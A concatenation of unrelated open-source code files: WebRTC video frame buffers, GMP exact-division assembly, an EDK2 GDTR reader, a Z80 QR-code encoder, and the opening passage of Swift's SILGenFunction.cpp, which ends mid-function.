#ifdef LZZ_ENABLE_INLINE
#define LZZ_INLINE inline
#else
#define LZZ_INLINE
#endif
namespace smtc
{
// Accessor: the data-function definition held by this block data scope.
LZZ_INLINE VdfDataFuncDefnPtr const & VdfBlockDataScope::getVdfDataFuncDefn () const
{
  return m_vdf_data_func_defn;
}
}
#undef LZZ_INLINE
|
/*
* Copyright (c) 2015 The WebRTC project authors. All Rights Reserved.
*
* Use of this source code is governed by a BSD-style license
* that can be found in the LICENSE file in the root of the source
* tree. An additional intellectual property rights grant can be found
* in the file PATENTS. All contributing project authors may
* be found in the AUTHORS file in the root of the source tree.
*/
#include "webrtc/common_video/include/video_frame_buffer.h"
#include "webrtc/base/bind.h"
#include "webrtc/base/checks.h"
// Aligning pointer to 64 bytes for improved performance, e.g. use SIMD.
static const int kBufferAlignment = 64;
namespace webrtc {
namespace {
// Used in rtc::Bind to keep a buffer alive until destructor is called.
// The bound scoped_refptr copy holds a reference; the body is intentionally
// empty — dropping the copy releases the reference.
static void NoLongerUsedCallback(rtc::scoped_refptr<VideoFrameBuffer> dummy) {}
}  // anonymous namespace
// Base-class default: mutable access is not supported unless a subclass
// overrides it (I420Buffer does); reaching here is a programming error.
uint8_t* VideoFrameBuffer::MutableData(PlaneType type) {
  RTC_NOTREACHED();
  return nullptr;
}

VideoFrameBuffer::~VideoFrameBuffer() {}
// Convenience constructor: default strides (y = width, u/v = ceil(width/2)).
I420Buffer::I420Buffer(int width, int height)
    : I420Buffer(width, height, width, (width + 1) / 2, (width + 1) / 2) {
}

// Allocates one contiguous, 64-byte-aligned buffer holding the Y plane
// followed by the U then V planes (see data() for the offset math).
// Chroma planes have (height + 1) / 2 rows.
I420Buffer::I420Buffer(int width,
                       int height,
                       int stride_y,
                       int stride_u,
                       int stride_v)
    : width_(width),
      height_(height),
      stride_y_(stride_y),
      stride_u_(stride_u),
      stride_v_(stride_v),
      data_(static_cast<uint8_t*>(AlignedMalloc(
          stride_y * height + (stride_u + stride_v) * ((height + 1) / 2),
          kBufferAlignment))) {
  RTC_DCHECK_GT(width, 0);
  RTC_DCHECK_GT(height, 0);
  RTC_DCHECK_GE(stride_y, width);
  RTC_DCHECK_GE(stride_u, (width + 1) / 2);
  RTC_DCHECK_GE(stride_v, (width + 1) / 2);
}

I420Buffer::~I420Buffer() {
}
int I420Buffer::width() const {
  return width_;
}

int I420Buffer::height() const {
  return height_;
}

// Plane pointers are offsets into the single allocation made by the
// constructor: Y at 0, U after the Y plane, V after the U plane.
const uint8_t* I420Buffer::data(PlaneType type) const {
  switch (type) {
    case kYPlane:
      return data_.get();
    case kUPlane:
      return data_.get() + stride_y_ * height_;
    case kVPlane:
      return data_.get() + stride_y_ * height_ +
             stride_u_ * ((height_ + 1) / 2);
    default:
      RTC_NOTREACHED();
      return nullptr;
  }
}

// Mutable access is only legal while this object holds the sole reference;
// otherwise another owner could observe the mutation.
uint8_t* I420Buffer::MutableData(PlaneType type) {
  RTC_DCHECK(HasOneRef());
  return const_cast<uint8_t*>(
      static_cast<const VideoFrameBuffer*>(this)->data(type));
}

int I420Buffer::stride(PlaneType type) const {
  switch (type) {
    case kYPlane:
      return stride_y_;
    case kUPlane:
      return stride_u_;
    case kVPlane:
      return stride_v_;
    default:
      RTC_NOTREACHED();
      return 0;
  }
}

// An I420Buffer is a plain memory buffer, never a platform handle.
void* I420Buffer::native_handle() const {
  return nullptr;
}

// Already I420 — conversion from a native handle does not apply here.
rtc::scoped_refptr<VideoFrameBuffer> I420Buffer::NativeToI420Buffer() {
  RTC_NOTREACHED();
  return nullptr;
}
// Wraps a platform-specific frame handle (e.g. a texture); pixel data is not
// directly accessible, so data()/stride() must never be called on this type.
NativeHandleBuffer::NativeHandleBuffer(void* native_handle,
                                       int width,
                                       int height)
    : native_handle_(native_handle), width_(width), height_(height) {
  RTC_DCHECK(native_handle != nullptr);
  RTC_DCHECK_GT(width, 0);
  RTC_DCHECK_GT(height, 0);
}

int NativeHandleBuffer::width() const {
  return width_;
}

int NativeHandleBuffer::height() const {
  return height_;
}

const uint8_t* NativeHandleBuffer::data(PlaneType type) const {
  RTC_NOTREACHED();  // Should not be called.
  return nullptr;
}

int NativeHandleBuffer::stride(PlaneType type) const {
  RTC_NOTREACHED();  // Should not be called.
  return 0;
}

void* NativeHandleBuffer::native_handle() const {
  return native_handle_;
}
// Non-owning I420 view over externally managed plane memory. The
// no_longer_used callback is invoked from the destructor so the real owner
// knows when the planes may be released or reused.
WrappedI420Buffer::WrappedI420Buffer(int width,
                                     int height,
                                     const uint8_t* y_plane,
                                     int y_stride,
                                     const uint8_t* u_plane,
                                     int u_stride,
                                     const uint8_t* v_plane,
                                     int v_stride,
                                     const rtc::Callback0<void>& no_longer_used)
    : width_(width),
      height_(height),
      y_plane_(y_plane),
      u_plane_(u_plane),
      v_plane_(v_plane),
      y_stride_(y_stride),
      u_stride_(u_stride),
      v_stride_(v_stride),
      no_longer_used_cb_(no_longer_used) {
}

WrappedI420Buffer::~WrappedI420Buffer() {
  // Notify the owner that the wrapped memory is no longer referenced.
  no_longer_used_cb_();
}

int WrappedI420Buffer::width() const {
  return width_;
}

int WrappedI420Buffer::height() const {
  return height_;
}

const uint8_t* WrappedI420Buffer::data(PlaneType type) const {
  switch (type) {
    case kYPlane:
      return y_plane_;
    case kUPlane:
      return u_plane_;
    case kVPlane:
      return v_plane_;
    default:
      RTC_NOTREACHED();
      return nullptr;
  }
}

int WrappedI420Buffer::stride(PlaneType type) const {
  switch (type) {
    case kYPlane:
      return y_stride_;
    case kUPlane:
      return u_stride_;
    case kVPlane:
      return v_stride_;
    default:
      RTC_NOTREACHED();
      return 0;
  }
}

void* WrappedI420Buffer::native_handle() const {
  return nullptr;
}

rtc::scoped_refptr<VideoFrameBuffer> WrappedI420Buffer::NativeToI420Buffer() {
  RTC_NOTREACHED();
  return nullptr;
}
// Returns a zero-copy center crop of |buffer| as a WrappedI420Buffer that
// keeps |buffer| alive (via rtc::Bind) until the crop is released.
// Requires a non-native buffer and crop dimensions no larger than the source;
// returns |buffer| unchanged when no cropping is needed.
rtc::scoped_refptr<VideoFrameBuffer> ShallowCenterCrop(
    const rtc::scoped_refptr<VideoFrameBuffer>& buffer,
    int cropped_width,
    int cropped_height) {
  RTC_CHECK(buffer->native_handle() == nullptr);
  RTC_CHECK_LE(cropped_width, buffer->width());
  RTC_CHECK_LE(cropped_height, buffer->height());
  if (buffer->width() == cropped_width && buffer->height() == cropped_height)
    return buffer;

  // Center crop to |cropped_width| x |cropped_height|.
  // Make sure offset is even so that u/v plane becomes aligned.
  const int uv_offset_x = (buffer->width() - cropped_width) / 4;
  const int uv_offset_y = (buffer->height() - cropped_height) / 4;
  const int offset_x = uv_offset_x * 2;
  const int offset_y = uv_offset_y * 2;

  const uint8_t* y_plane = buffer->data(kYPlane) +
                           buffer->stride(kYPlane) * offset_y + offset_x;
  const uint8_t* u_plane = buffer->data(kUPlane) +
                           buffer->stride(kUPlane) * uv_offset_y + uv_offset_x;
  const uint8_t* v_plane = buffer->data(kVPlane) +
                           buffer->stride(kVPlane) * uv_offset_y + uv_offset_x;
  return new rtc::RefCountedObject<WrappedI420Buffer>(
      cropped_width, cropped_height,
      y_plane, buffer->stride(kYPlane),
      u_plane, buffer->stride(kUPlane),
      v_plane, buffer->stride(kVPlane),
      rtc::Bind(&NoLongerUsedCallback, buffer));
}
} // namespace webrtc
|
dnl AMD64 mpn_divexact_1 -- mpn by limb exact division.
dnl Copyright 2001, 2002, 2004-2006, 2010-2012 Free Software Foundation, Inc.
dnl This file is part of the GNU MP Library.
dnl
dnl The GNU MP Library is free software; you can redistribute it and/or modify
dnl it under the terms of either:
dnl
dnl * the GNU Lesser General Public License as published by the Free
dnl Software Foundation; either version 3 of the License, or (at your
dnl option) any later version.
dnl
dnl or
dnl
dnl * the GNU General Public License as published by the Free Software
dnl Foundation; either version 2 of the License, or (at your option) any
dnl later version.
dnl
dnl or both in parallel, as here.
dnl
dnl The GNU MP Library is distributed in the hope that it will be useful, but
dnl WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
dnl or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
dnl for more details.
dnl
dnl You should have received copies of the GNU General Public License and the
dnl GNU Lesser General Public License along with the GNU MP Library. If not,
dnl see https://www.gnu.org/licenses/.
include(`../config.m4')
C cycles/limb
C norm unorm
C AMD K8,K9 11 11
C AMD K10 11 11
C Intel P4 ?
C Intel core2 13.5 13.25
C Intel corei 14.25
C Intel atom 34 36
C VIA nano 19.25 19.25
C INPUT PARAMETERS
C rp rdi
C up rsi
C n rdx
C divisor rcx
ABI_SUPPORT(DOS64)
ABI_SUPPORT(STD64)
ASM_START()
TEXT
ALIGN(16)
PROLOGUE(mpn_divexact_1)
	FUNC_ENTRY(4)
	push	%rbx

	mov	%rcx, %rax
	xor	R32(%rcx), R32(%rcx)	C shift count
	mov	%rdx, %r8

C Strip trailing zero bits from the divisor; rcx holds the shift count.
	bt	$0, R32(%rax)
	jc	L(odd)			C skip bsfq unless divisor is even
	bsf	%rax, %rcx
	shr	R8(%rcx), %rax
L(odd):	mov	%rax, %rbx
	shr	R32(%rax)
	and	$127, R32(%rax)		C d/2, 7 bits

C Compute the multiplicative inverse of the odd divisor mod 2^64: an 8-bit
C table lookup followed by Newton steps, doubling the precision each time
C (8 -> 16 -> 32 -> 64 bits). Final inverse lands in r10.
	LEA(	binvert_limb_table, %rdx)
	movzbl	(%rdx,%rax), R32(%rax)	C inv 8 bits
	mov	%rbx, %r11		C d without twos
	lea	(%rax,%rax), R32(%rdx)	C 2*inv
	imul	R32(%rax), R32(%rax)	C inv*inv
	imul	R32(%rbx), R32(%rax)	C inv*inv*d
	sub	R32(%rax), R32(%rdx)	C inv = 2*inv - inv*inv*d, 16 bits
	lea	(%rdx,%rdx), R32(%rax)	C 2*inv
	imul	R32(%rdx), R32(%rdx)	C inv*inv
	imul	R32(%rbx), R32(%rdx)	C inv*inv*d
	sub	R32(%rdx), R32(%rax)	C inv = 2*inv - inv*inv*d, 32 bits
	lea	(%rax,%rax), %r10	C 2*inv
	imul	%rax, %rax		C inv*inv
	imul	%rbx, %rax		C inv*inv*d
	sub	%rax, %r10		C inv = 2*inv - inv*inv*d, 64 bits

C Point rsi/rdi at the operand ends and negate n, so index register r8
C counts upward toward zero.
	lea	(%rsi,%r8,8), %rsi	C up end
	lea	-8(%rdi,%r8,8), %rdi	C rp end
	neg	%r8			C -n

	mov	(%rsi,%r8,8), %rax	C up[0]

	inc	%r8
	jz	L(one)

	test	R32(%rcx), R32(%rcx)
	jnz	L(unorm)		C branch if count != 0
	xor	R32(%rbx), R32(%rbx)
	jmp	L(nent)

C Main loop for an odd ("normalized") divisor: rbx carries the borrow bit,
C rdx the carry limb from the previous mul.
	ALIGN(8)
L(ntop):mul	%r11			C carry limb in rdx	0 10
	mov	-8(%rsi,%r8,8), %rax	C
	sub	%rbx, %rax		C apply carry bit
	setc	%bl			C
	sub	%rdx, %rax		C apply carry limb	5
	adc	$0, %rbx		C			6
L(nent):imul	%r10, %rax		C			6
	mov	%rax, (%rdi,%r8,8)	C
	inc	%r8			C
	jnz	L(ntop)

	mov	-8(%rsi), %r9		C up high limb
	jmp	L(com)

C Variant for an even ("unnormalized") divisor: limbs are combined from two
C source limbs shifted by rcx before each step.
L(unorm):
	mov	(%rsi,%r8,8), %r9	C up[1]
	shr	R8(%rcx), %rax		C
	neg	R32(%rcx)
	shl	R8(%rcx), %r9		C
	neg	R32(%rcx)
	or	%r9, %rax
	xor	R32(%rbx), R32(%rbx)
	jmp	L(uent)

	ALIGN(8)
L(utop):mul	%r11			C carry limb in rdx	0 10
	mov	(%rsi,%r8,8), %rax	C
	shl	R8(%rcx), %rax		C
	neg	R32(%rcx)
	or	%r9, %rax
	sub	%rbx, %rax		C apply carry bit
	setc	%bl			C
	sub	%rdx, %rax		C apply carry limb	5
	adc	$0, %rbx		C			6
L(uent):imul	%r10, %rax		C			6
	mov	(%rsi,%r8,8), %r9	C
	shr	R8(%rcx), %r9		C
	neg	R32(%rcx)
	mov	%rax, (%rdi,%r8,8)	C
	inc	%r8			C
	jnz	L(utop)

C Common tail: fold the final carry into the high limb and store it.
L(com):	mul	%r11			C carry limb in rdx
	sub	%rbx, %r9		C apply carry bit
	sub	%rdx, %r9		C apply carry limb
	imul	%r10, %r9
	mov	%r9, (%rdi)
	pop	%rbx
	FUNC_EXIT()
	ret

C Single-limb operand: just shift out the divisor's twos and multiply by
C the inverse.
L(one):	shr	R8(%rcx), %rax
	imul	%r10, %rax
	mov	%rax, (%rdi)
	pop	%rbx
	FUNC_EXIT()
	ret
EPILOGUE()
|
;------------------------------------------------------------------------------
;
; Copyright (c) 2006, Intel Corporation. All rights reserved.<BR>
; This program and the accompanying materials
; are licensed and made available under the terms and conditions of the BSD License
; which accompanies this distribution. The full text of the license may be found at
; http://opensource.org/licenses/bsd-license.php.
;
; THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
; WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
;
; Module Name:
;
; ReadGdtr.Asm
;
; Abstract:
;
; AsmReadGdtr function
;
; Notes:
;
;------------------------------------------------------------------------------
.386
.model flat,C
.code
;------------------------------------------------------------------------------
; VOID
; EFIAPI
; InternalX86ReadGdtr (
; OUT IA32_DESCRIPTOR *Gdtr
; );
;------------------------------------------------------------------------------
InternalX86ReadGdtr PROC
    mov     eax, [esp + 4]          ; eax <- Gdtr (the caller's output pointer)
    sgdt    fword ptr [eax]         ; store the 6-byte GDT register into *Gdtr
    ret
InternalX86ReadGdtr ENDP
END
|
; https://github.com/leiradel/qrc1
; ------------------------------------------------------------------------
; Macros for some undocumented Z80 instructions.
; ------------------------------------------------------------------------
; addixl: "add a, ixl" — the $dd prefix makes the following L access operate
; on IXL instead of L (undocumented Z80 opcode).
addixl: macro
    db $dd
    add a, l
    endm

; ldixh_a: "ld ixh, a" (undocumented, via the same $dd prefix trick).
ldixh_a: macro
    db $dd
    ld h, a
    endm

; decixh: "dec ixh" (undocumented).
decixh: macro
    db $dd
    dec h
    endm

; decixl: "dec ixl" (undocumented).
decixl: macro
    db $dd
    dec l
    endm
; qrc11_message contains a $40 byte followed by the message length followed
; by the message (maximum 251 bytes). This routine encodes it in place,
; computes the per-block ECC, interleaves the blocks, and draws the code.
qrc11_encmessage:
    ; --------------------------------------------------------------------
    ; Encode the message.
    ; --------------------------------------------------------------------
    ; Insert a 0000 nibble before the length.
    ld hl, qrc11_message + 1
    ld c, (hl)                      ; C = message length
    xor a
    ; Shift the message to the right by four bits (rrd rotates one nibble
    ; between A and (HL) per iteration).
    ld b, c
    inc b
qrc11_shift_msg:
    rrd
    inc hl
    djnz qrc11_shift_msg
    ; A has the low nibble of the last message byte, shift it to the high
    ; nibble and set the low nibble to 0, which is the end of message mark.
    ld (hl), 0
    rrd
    inc hl
    ; Pad the rest of the message with $ec and $11 (alternating: $ec xor $fd
    ; = $11 and vice versa).
    ld a, 251
    sub c
    jr z, qrc11_no_padding
    ld b, a
    ld a, $ec
qrc11_pad_msg:
    ld (hl), a
    inc hl
    xor $fd
    djnz qrc11_pad_msg
qrc11_no_padding:
    ; --------------------------------------------------------------------
    ; Calculate the message ECC.
    ; --------------------------------------------------------------------
    ; Copy each block of the original encoded message to the target buffer,
    ; the ECC evaluation will overwrite it so we need to restore it at the end.
    ; Block 1 is 50 bytes, blocks 2-5 are 51 bytes each.
    ld hl, qrc11_block1
    ld de, qrc11_b1
    ld bc, 50
    call qrc11_ecc
    ld hl, qrc11_block2
    ld de, qrc11_b2
    ld bc, 51
    call qrc11_ecc
    ld hl, qrc11_block3
    ld de, qrc11_b3
    ld bc, 51
    call qrc11_ecc
    ld hl, qrc11_block4
    ld de, qrc11_b4
    ld bc, 51
    call qrc11_ecc
    ld hl, qrc11_block5
    ld de, qrc11_b5
    ld bc, 51
    call qrc11_ecc
    ; --------------------------------------------------------------------
    ; Interleave message and ecc blocks.
    ; --------------------------------------------------------------------
qrc11_interleave:
    ; First the 50 positions common to all five data blocks...
    ld hl, qrc11_b1
    ld de, qrc11_message
    ld a, 50
qrc11_dintl:
    call qrc11_dint
    ld bc, qrc11_b1 - qrc11_b5      ; rewind HL back to the next b1 byte
    add hl, bc
    dec a
    jr nz, qrc11_dintl
    ; ...then the extra 51st byte of blocks 2-5...
    ld hl, qrc11_b2 + 50
    ldi
    ld hl, qrc11_b3 + 50
    ldi
    ld hl, qrc11_b4 + 50
    ldi
    ld hl, qrc11_b5 + 50
    ldi
    ; ...and finally the 30 interleaved ECC bytes of each block.
    ld hl, qrc11_b1_ecc
    ld a, 30
qrc11_eintl:
    call qrc11_eint
    ld bc, qrc11_b1_ecc - qrc11_b5_ecc
    add hl, bc
    dec a
    jr nz, qrc11_eintl
    ; --------------------------------------------------------------------
    ; Display QR code with checkerboard mask.
    ; --------------------------------------------------------------------
    ; 61x61 modules; qrc11_map holds one little-endian word per module
    ; encoding bit index (low 3 bits) and byte offset (remaining bits).
    ld hl, qrc11_map
    ld c, 61
qrc11_d1:
    ld b, 61
qrc11_d2: push bc
    ld e, (hl)
    inc hl
    ld d, (hl)
    inc hl
    ld a, e
    and 7                           ; A = bit index within the byte
    srl d                           ; DE >>= 3 gives the byte offset
    rr e
    srl d
    rr e
    srl d
    rr e
    ld bc, qrc11_message
    ex de, hl
    add hl, bc
    ex de, hl
    ld b, a
    ld a, (de)                      ; fetch the data byte
    inc b
qrc11_d3: rlca                      ; rotate the wanted bit into position
    djnz qrc11_d3
    pop bc
    xor b                           ; checkerboard mask: bit0 of (row xor col)
    xor c
    rrca
    call nc, qrc11_module
    djnz qrc11_d2
    dec c
    jr nz, qrc11_d1
    ret
; ------------------------------------------------------------------------
; Interleave bytes: copy one byte from each of the five blocks (b1..b5)
; into consecutive destination bytes. qrc11_eint is the ECC variant
; (blocks are 50+30 bytes apart), qrc11_dint the data variant (49+30 for
; the first hop, 50+30 afterwards).
; ------------------------------------------------------------------------
qrc11_eint:
    ldi
    ld bc, 50 + 30
    jr qrc11_int
qrc11_dint:
    ldi
    ld bc, 49 + 30
qrc11_int:
    add hl, bc
    ldi
    ld c, 50 + 30
    add hl, bc
    ldi
    ld c, 50 + 30
    add hl, bc
    ldi
    ld c, 50 + 30
    add hl, bc
    ldi
    ret
; ------------------------------------------------------------------------
; Calculate the block ECC.
; In:  HL = source block, DE = target buffer, BC = block length.
; The block is copied to the target, 30 ECC bytes are computed after it
; (polynomial division over GF(256), modulus x^8+x^4+x^3+x^2+1 = 285),
; then the copied block is restored from the source.
; ------------------------------------------------------------------------
qrc11_ecc:
    ; Save block parameters for restoring
    push hl
    push de
    push bc
    ; Save message block length for later
    push bc
    ; Save message block address for later
    push de
    ldir
    ; Zero the 30 bytes where the ECC will be stored.
    xor a
    ld b, 30
qrc11_zero_ecc:
    ld (de), a
    inc de
    djnz qrc11_zero_ecc
    ; HL is the polynomial A.
    pop hl
    ; IXL is the outer loop counter (i) for the length of A.
    pop ix
qrc11_loop_i:
    ; Save HL as it'll be incremented in the inner loop.
    push hl
    ; Save A[i] in B to be used inside the inner loop.
    ld b, (hl)
    ; DE is the polynomial B.
    ld de, qrc11_ecc_poly
    ; Evaluate the inner loop count limit.
    ld a, 31
    addixl
    dec a
    ; IXH is inner loop counter (j) up to length(A) - i.
    ldixh_a
qrc11_loop_j:
    ; A is B[j]
    ld a, (de)
    ; Save DE as we'll use D and E in the gf_mod loop.
    push de
    ; D is A[i], E is the gf_mod result.
    ld d, b
    ld e, 0
    ; Russian-peasant GF(256) multiply:
    ; A is x, D is y, E is r, C is a scratch register.
    jr qrc11_test_y
qrc11_xor_res:
    ; y had the 0th bit set, r ^= x.
    ld c, a
    xor e
    ld e, a
    ld a, c
qrc11_dont_xor:
    ; x <<= 1, set carry if x >= 256.
    add a, a
    jr nc, qrc11_test_y
    ; x was >= 256, xor it with the module.
    xor 285 - 256
qrc11_test_y:
    ; y >>= 1, update r if the 0th bit is set, end the loop if
    ; it's zero.
    srl d
    jr c, qrc11_xor_res
    jr nz, qrc11_dont_xor
    ; A[i + j] ^= gf_mod(...)
    ld a, (hl)
    xor e
    ld (hl), a
    ; Restore DE.
    pop de
    ; Update HL and DE to point to the next bytes of A and B.
    inc hl
    inc de
    ; Inner loop test.
    decixh
    jr nz, qrc11_loop_j
    ; Restore HL since it was changed in the inner loop, and make it point
    ; to the next byte in A.
    pop hl
    inc hl
    ; Outer loop test.
    decixl
    jr nz, qrc11_loop_i
    ; Restore the original encoded message, since the loops above zero it.
    pop bc
    pop de
    pop hl
    ldir
    ret
; The ECC version 11 level M generator polynomial (leading 1 plus 30
; coefficients).
qrc11_ecc_poly:
    db 1, 212, 246, 77, 73, 195, 192, 75, 98, 5, 70, 103, 177, 22, 217, 138
    db 51, 181, 246, 72, 25, 18, 46, 228, 74, 216, 195, 11, 106, 130, 150
    ds 51
; The message, it'll be encoded in place. Data capacity is split into five
; blocks: block 1 is 50 bytes (including the $40 marker and length byte),
; blocks 2-5 are 51 bytes each.
qrc11_message:
qrc11_block1:
    db $40   ; presumably the byte-mode indicator nibble — confirm
    db 0     ; Message length
    ds 48    ; Message source
qrc11_block2:
    ds 51    ; Message source
qrc11_block3:
    ds 51    ; Message source
qrc11_block4:
    ds 51    ; Message source
qrc11_block5:
    ds 51    ; Message source
; Extra space for encoded message
    ds 30 * 5
; Fixed white and black modules
    db $40
; Per-block working buffers: each block's copy is followed by its 30
; computed ECC bytes, matching the offsets used by qrc11_eint/qrc11_dint.
qrc11_b1:
    ds 50    ; Message target
qrc11_b1_ecc:
    ds 30    ; Computed ECC
qrc11_b2:
    ds 51    ; Message target
qrc11_b2_ecc:
    ds 30    ; Computed ECC
qrc11_b3:
    ds 51    ; Message target
qrc11_b3_ecc:
    ds 30    ; Computed ECC
qrc11_b4:
    ds 51    ; Message target
qrc11_b4_ecc:
    ds 30    ; Computed ECC
qrc11_b5:
    ds 51    ; Message target
qrc11_b5_ecc:
    ds 30    ; Computed ECC
|
Name: mn_hp_smsub0.asm
Type: file
Size: 117589
Last-Modified: '1993-08-25T07:36:08Z'
SHA-1: 5CEFDF104B5612100CE778789D8B0E1147C1FC01
Description: null
|
//===--- SILGenFunction.cpp - Top-level lowering for functions ------------===//
//
// This source file is part of the Swift.org open source project
//
// Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
// Licensed under Apache License v2.0 with Runtime Library Exception
//
// See https://swift.org/LICENSE.txt for license information
// See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
//
//===----------------------------------------------------------------------===//
//
// This file defines the primary routines for creating and emitting
// functions.
//
//===----------------------------------------------------------------------===//
#include "SILGenFunction.h"
#include "RValue.h"
#include "SILGenFunctionBuilder.h"
#include "Scope.h"
#include "swift/ABI/MetadataValues.h"
#include "swift/AST/ClangModuleLoader.h"
#include "swift/AST/DiagnosticsSIL.h"
#include "swift/AST/FileUnit.h"
#include "swift/AST/GenericEnvironment.h"
#include "swift/AST/Initializer.h"
#include "swift/AST/ParameterList.h"
#include "swift/AST/PropertyWrappers.h"
#include "swift/AST/SourceFile.h"
#include "swift/SIL/SILArgument.h"
#include "swift/SIL/SILProfiler.h"
#include "swift/SIL/SILUndef.h"
using namespace swift;
using namespace Lowering;
//===----------------------------------------------------------------------===//
// SILGenFunction Class implementation
//===----------------------------------------------------------------------===//
// Construct a SILGenFunction for emitting the body of \p F on behalf of
// \p SGM. \p DC is the DeclContext of the entity being lowered and must be
// non-null.
SILGenFunction::SILGenFunction(SILGenModule &SGM, SILFunction &F,
                               DeclContext *DC)
    : SGM(SGM), F(F), silConv(SGM.M), FunctionDC(DC),
      StartOfPostmatter(F.end()), B(*this),
      CurrentSILLoc(F.getLocation()), Cleanups(*this),
      StatsTracer(SGM.M.getASTContext().Stats,
                  "SILGen-function", &F) {
  assert(DC && "creating SGF without a DeclContext?");
  // Emission starts in a fresh entry block using the function's debug scope.
  B.setInsertionPoint(createBasicBlock());
  B.setCurrentDebugScope(F.getDebugScope());
}
/// SILGenFunction destructor - called after the entire function's AST has been
/// visited. This handles "falling off the end of the function" logic.
/// Both checks below are assert-only, so this destructor is a no-op in
/// release builds.
SILGenFunction::~SILGenFunction() {
  // If the end of the function isn't terminated, we screwed up somewhere.
  assert(!B.hasValidInsertionPoint() &&
         "SILGenFunction did not terminate function?!");

  // If we didn't clean up the rethrow destination, we screwed up somewhere.
  assert(!ThrowDest.isValid() &&
         "SILGenFunction did not emit throw destination");
}
//===----------------------------------------------------------------------===//
// Function emission
//===----------------------------------------------------------------------===//
// Compute the name the #function magic literal evaluates to inside the
// given declaration context.
DeclName SILGenModule::getMagicFunctionName(DeclContext *dc) {
  // Closures report their parent's name.
  if (auto *ace = dyn_cast<AbstractClosureExpr>(dc))
    return getMagicFunctionName(ace->getParent());

  if (auto *afd = dyn_cast<AbstractFunctionDecl>(dc)) {
    // Accessors report the name of the storage they belong to.
    if (auto *accessor = dyn_cast<AccessorDecl>(afd))
      return accessor->getStorage()->getName();
    // A 'defer' body reports the name of the function that contains it.
    if (auto *fn = dyn_cast<FuncDecl>(afd))
      if (fn->isDeferBody())
        return getMagicFunctionName(fn->getParent());
    return afd->getName();
  }

  if (auto *init = dyn_cast<Initializer>(dc))
    return getMagicFunctionName(init->getParent());

  if (auto *nominal = dyn_cast<NominalTypeDecl>(dc))
    return nominal->getName();

  if (auto *topLevel = dyn_cast<TopLevelCodeDecl>(dc))
    return topLevel->getModuleContext()->getName();

  if (auto *fileUnit = dyn_cast<FileUnit>(dc))
    return fileUnit->getParentModule()->getName();

  if (auto *module = dyn_cast<ModuleDecl>(dc))
    return module->getName();

  if (auto *ext = dyn_cast<ExtensionDecl>(dc)) {
    assert(ext->getExtendedNominal() && "extension for nonnominal");
    return ext->getExtendedNominal()->getName();
  }

  if (auto *elt = dyn_cast<EnumElementDecl>(dc))
    return elt->getName();

  if (auto *subscript = dyn_cast<SubscriptDecl>(dc))
    return subscript->getName();

  llvm_unreachable("unexpected #function context");
}
// Compute the #function name for the entity a SILDeclRef points at,
// dispatching on the reference kind.
DeclName SILGenModule::getMagicFunctionName(SILDeclRef ref) {
  switch (ref.kind) {
  case SILDeclRef::Kind::Func:
    if (auto closure = ref.getAbstractClosureExpr())
      return getMagicFunctionName(closure);
    return getMagicFunctionName(cast<FuncDecl>(ref.getDecl()));
  case SILDeclRef::Kind::Initializer:
  case SILDeclRef::Kind::Allocator:
    return getMagicFunctionName(cast<ConstructorDecl>(ref.getDecl()));
  case SILDeclRef::Kind::Deallocator:
  case SILDeclRef::Kind::Destroyer:
    return getMagicFunctionName(cast<DestructorDecl>(ref.getDecl()));
  // All variable-backed entry points report the name of the context the
  // variable is declared in.
  case SILDeclRef::Kind::GlobalAccessor:
  case SILDeclRef::Kind::StoredPropertyInitializer:
  case SILDeclRef::Kind::PropertyWrapperBackingInitializer:
  case SILDeclRef::Kind::PropertyWrapperInitFromProjectedValue:
    return getMagicFunctionName(cast<VarDecl>(ref.getDecl())->getDeclContext());
  case SILDeclRef::Kind::DefaultArgGenerator:
    return getMagicFunctionName(cast<DeclContext>(ref.getDecl()));
  case SILDeclRef::Kind::IVarInitializer:
  case SILDeclRef::Kind::IVarDestroyer:
    return getMagicFunctionName(cast<ClassDecl>(ref.getDecl()));
  case SILDeclRef::Kind::EnumElement:
    return getMagicFunctionName(
        cast<EnumElementDecl>(ref.getDecl())->getDeclContext());
  case SILDeclRef::Kind::AsyncEntryPoint:
  case SILDeclRef::Kind::EntryPoint: {
    auto *file = ref.getDecl()->getDeclContext()->getParentSourceFile();
    return getMagicFunctionName(file);
  }
  }

  llvm_unreachable("Unhandled SILDeclRefKind in switch.");
}
// Form a reference to \p methodConstant and specialize it with \p subMap.
// Returns the (unmanaged) function value together with its specialized
// SIL type.
std::tuple<ManagedValue, SILType>
SILGenFunction::emitSiblingMethodRef(SILLocation loc,
                                     SILValue selfValue,
                                     SILDeclRef methodConstant,
                                     SubstitutionMap subMap) {
  // Dynamic methods must go through runtime-hookable virtual dispatch
  // (viz. objc_msgSend for now); everything else gets a direct reference.
  const bool useDynamicDispatch =
      methodConstant.hasDecl() &&
      methodConstant.getDecl()->shouldUseObjCDispatch();

  SILValue fnValue;
  if (useDynamicDispatch) {
    auto fnType =
        SGM.Types.getConstantInfo(getTypeExpansionContext(), methodConstant)
            .SILFnType;
    fnValue = emitDynamicMethodRef(loc, methodConstant, fnType).getValue();
  } else {
    fnValue = emitGlobalFunctionRef(loc, methodConstant);
  }

  // Specialize the generic method with the caller's substitutions.
  SILType fnTy = fnValue->getType().substGenericArgs(
      SGM.M, subMap, getTypeExpansionContext());

  return std::make_tuple(ManagedValue::forUnmanaged(fnValue), fnTy);
}
/// Emit the values captured by \p closure into \p capturedArgs.
///
/// \param loc      location to attribute the emitted instructions to.
/// \param closure  the function/closure whose lowered captures are emitted.
/// \param purpose  how the captures will be consumed: partial applications
///                 must receive ownership, immediate applications may borrow.
/// \param capturedArgs  filled with one ManagedValue per lowered capture.
void SILGenFunction::emitCaptures(SILLocation loc,
                                  SILDeclRef closure,
                                  CaptureEmission purpose,
                                  SmallVectorImpl<ManagedValue> &capturedArgs) {
  auto captureInfo = SGM.Types.getLoweredLocalCaptures(closure);
  // For boxed captures, we need to mark the contained variables as having
  // escaped for DI diagnostics.
  SmallVector<SILValue, 2> escapesToMark;

  // Partial applications take ownership of the context parameters, so we'll
  // need to pass ownership rather than merely guaranteeing parameters.
  bool canGuarantee;
  bool captureCanEscape = true;
  switch (purpose) {
  case CaptureEmission::PartialApplication:
    canGuarantee = false;
    break;
